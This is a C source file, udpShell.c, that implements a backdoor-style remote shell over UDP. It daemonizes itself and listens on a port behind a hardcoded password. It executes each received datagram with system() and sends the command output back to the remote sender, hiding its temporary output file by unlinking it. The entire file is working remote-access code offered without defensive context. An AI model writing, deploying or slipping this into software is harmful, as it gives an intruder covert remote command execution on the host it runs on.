/*
 * udpShell.c
 */
#include "include/sockFuncWrap.h"
#include "include/unp.h"
#include "include/fork.h"
#include "include/signal.h"
#include "include/utility.h"

#include <sys/mman.h>
#include <sys/wait.h>

#define MAX_ADDR_LENGTH  64
#define LISTEN_PORT      5000
#define SEND_PORT        6000
#define TMP_FILE         "/tmp/tmp_udpShell.log"
#define PASSWD           "mypass"
#define PASSWD_MSG       "password accepted\n"
#define WRONG_PASSWD_MSG "password not accepted\n"

void create_listen_socket(int *, struct sockaddr_in *, int);
void create_send_socket(int *, struct sockaddr_in *, struct sockaddr_in, int, int);
int check_passwd(void *);
int do_accept(int, struct sockaddr_in, int);

int main(int argc, char **argv)
{
   int listen_sockfd;
   int listen_port;
   int send_port;
   struct sockaddr_in servaddr;

   
#ifndef DEBUG   
   pid_t pid;
   if ( (pid = Fork()) > 0) {
      /*
       * parent
       */
      exit(0);
   } else {
      /*
       * child
       */
      setsid();
   }
#endif   
   
   fprintf(stderr, "usage: %s <listen port> <send port>\n", argv[ 0 ]);
   send_port   = SEND_PORT;	
   listen_port = LISTEN_PORT;
   if (argc == 3) {
      send_port   = atoi(argv[ 2 ]);
      listen_port = atoi(argv[ 1 ]);
   } else if (argc == 2) {      
      listen_port = atoi(argv[ 1 ]);
   } else {
      fprintf(stderr, "using default ports\n");
   }
   
   
   create_listen_socket(&listen_sockfd, &servaddr, listen_port);   
   while (do_accept(listen_sockfd, servaddr, send_port));

   exit(0);
}



int do_accept(int listen_sockfd, struct sockaddr_in servaddr, int send_port)
{
   socklen_t len;
   char *buff;
   char *send_buff;
   void *addr;
   int  fd;
   int  bytes_in;
   int  bytes_out;
   int  send_sockfd;
   int  send_size = MAXLINE;
   pid_t pid;
   struct sockaddr_in send_cliaddr;

#ifdef DEBUG
   fprintf(stderr, "accept\n\n");
#endif
   
   len  = sizeof(struct sockaddr_in);
   buff = (char *) malloc(MAXLINE);
   send_buff = (char *) malloc(MAXLINE);

   if ( (fd = open(TMP_FILE, O_CREAT | O_TRUNC | O_RDWR, S_IRWXU)) == -1) {
      fprintf(stderr, "cannot open file %s. aborting!\n", (char *) TMP_FILE);
      exit(1);	
   }
   
   if ( (addr = mmap(0, MAXLINE, PROT_WRITE | PROT_WRITE, MAP_PRIVATE, fd, 10*getpagesize()) ) == MAP_FAILED) {
      fprintf(stderr, "mmap error. aborting!\n");
      exit(2);	
   }
   dup2(fd, STDOUT_FILENO);
#ifndef DEBUG   
   dup2(fd, STDERR_FILENO);
#endif   
   unlink(TMP_FILE);
   
   memset( (void *) buff, 0, MAXLINE);
   bytes_in = Recvfrom(listen_sockfd, buff, MAXLINE, 0, (SA *) &servaddr, &len);
#ifdef DEBUG
   fprintf(stderr, "1st got %s\n", buff);
#endif
   create_send_socket(&send_sockfd, &send_cliaddr, servaddr, send_size, send_port);
   while (!check_passwd(buff)) {
   
      memset( (void *) buff, 0, MAXLINE);
      bytes_out = Sendto(send_sockfd, WRONG_PASSWD_MSG , strlen(WRONG_PASSWD_MSG), 0, (SA *) &send_cliaddr, (socklen_t) sizeof(struct sockaddr_in));
      bytes_in = Recvfrom(listen_sockfd, buff, MAXLINE, 0, (SA *) &servaddr, &len);
            
#ifdef DEBUG      
      fprintf(stderr, "got pass: %s\n", buff);
#endif      
   } 
   bytes_out = Sendto(send_sockfd, PASSWD_MSG , strlen(PASSWD_MSG), 0, (SA *) &send_cliaddr, (socklen_t) sizeof(struct sockaddr_in));
   
   for ( ; ; ) {
      
      memset( (void *) buff, 0, MAXLINE);
      memset( (void *) send_buff, 0, MAXLINE);
      lseek(fd, 0, SEEK_SET);
      bytes_in = Recvfrom(listen_sockfd, buff, MAXLINE, 0, (SA *) &servaddr, &len);      
#ifdef DEBUG            
      fprintf(stderr, "got: %s\n", buff);
#endif            
      if (!strncmp(buff, "quit", 4)) {
	 Sendto(send_sockfd, "quitting", 8, 0, (SA *) &send_cliaddr, (socklen_t) sizeof(send_cliaddr));
	 close(send_sockfd);
	 return 1;
      }
      if ( (pid = fork()) < 0) {
	 fprintf(stderr, "fork error. aborting\n");
	 exit(3);
      } else if (pid == 0) {
	 /*
	  * child
	  */
	 close(listen_sockfd);
	 lseek(fd, 0, SEEK_SET);
	 write(fd, (const void *) 0, MAXLINE);
	 system(buff);
	 lseek(fd, 0, SEEK_SET);      
	 bytes_out = read(fd, (void *) send_buff, MAXLINE);
#ifdef DEBUG            
	 fprintf(stderr, "ran:\n %s\n", send_buff);
#endif            	 
	 Sendto(send_sockfd, send_buff, bytes_out, 0, (SA *) &send_cliaddr, (socklen_t) sizeof(send_cliaddr));
	 exit(0);
      } else {
	 /*
	  * parent
	  */
	 if ( (pid = waitpid(pid, NULL, WUNTRACED)) == -1) {
	    fprintf(stderr, "wait error. aborting\n");
	    exit(4);
	 } 
      }
                   
   } /* for */
   
   close(fd);
   close(listen_sockfd);
   close(send_sockfd);
   return 0;
}

/*
 * create a udp listen socket
 */
void create_listen_socket(int *sockfd, struct sockaddr_in *servaddr, int listen_port)
{
   /*
    * create the socket
    */
   *sockfd = Socket(AF_INET, SOCK_DGRAM, 0);
   
   /*
    * clean up servaddr
    */
   bzero(servaddr, sizeof(struct sockaddr_in));
   
   /*
    * set socket parameters
    */
   servaddr->sin_family = AF_INET;
   servaddr->sin_addr.s_addr = htonl(INADDR_ANY);
   servaddr->sin_port = htons(listen_port);
   
   /*
    * Bind the socket
    */
   Bind(*sockfd, (SA *) servaddr, sizeof(struct sockaddr_in));

   return;
}


   
int check_passwd(void *buff)
{
   char *line;
   
   line = buff;
   if (!strncmp(line, PASSWD, strlen(PASSWD))) return 1;
   
   return 0;   
}

/*
 * create send socket
 */
void create_send_socket(int *send_sockfd, struct sockaddr_in *send_cliaddr, struct sockaddr_in servaddr, int send_size, int send_port)
{
   char *source_addr;

   source_addr = (char *) malloc(MAX_ADDR_LENGTH);
   memset( (void *) source_addr, 0, MAX_ADDR_LENGTH);
   
   inet_ntop(AF_INET, (const void *) &servaddr.sin_addr, source_addr, (size_t) MAX_ADDR_LENGTH);
   bzero(send_cliaddr, sizeof(struct sockaddr_in));
   send_cliaddr->sin_family = AF_INET;
   send_cliaddr->sin_port = htons(send_port);
   Inet_pton(AF_INET, source_addr, (void *) &(send_cliaddr->sin_addr) );   
   *send_sockfd = Socket(AF_INET, SOCK_DGRAM, 0);
   setsockopt(*send_sockfd, SOL_SOCKET, SO_SNDBUF, &send_size, (socklen_t) sizeof(send_size));  
   
   return;
}
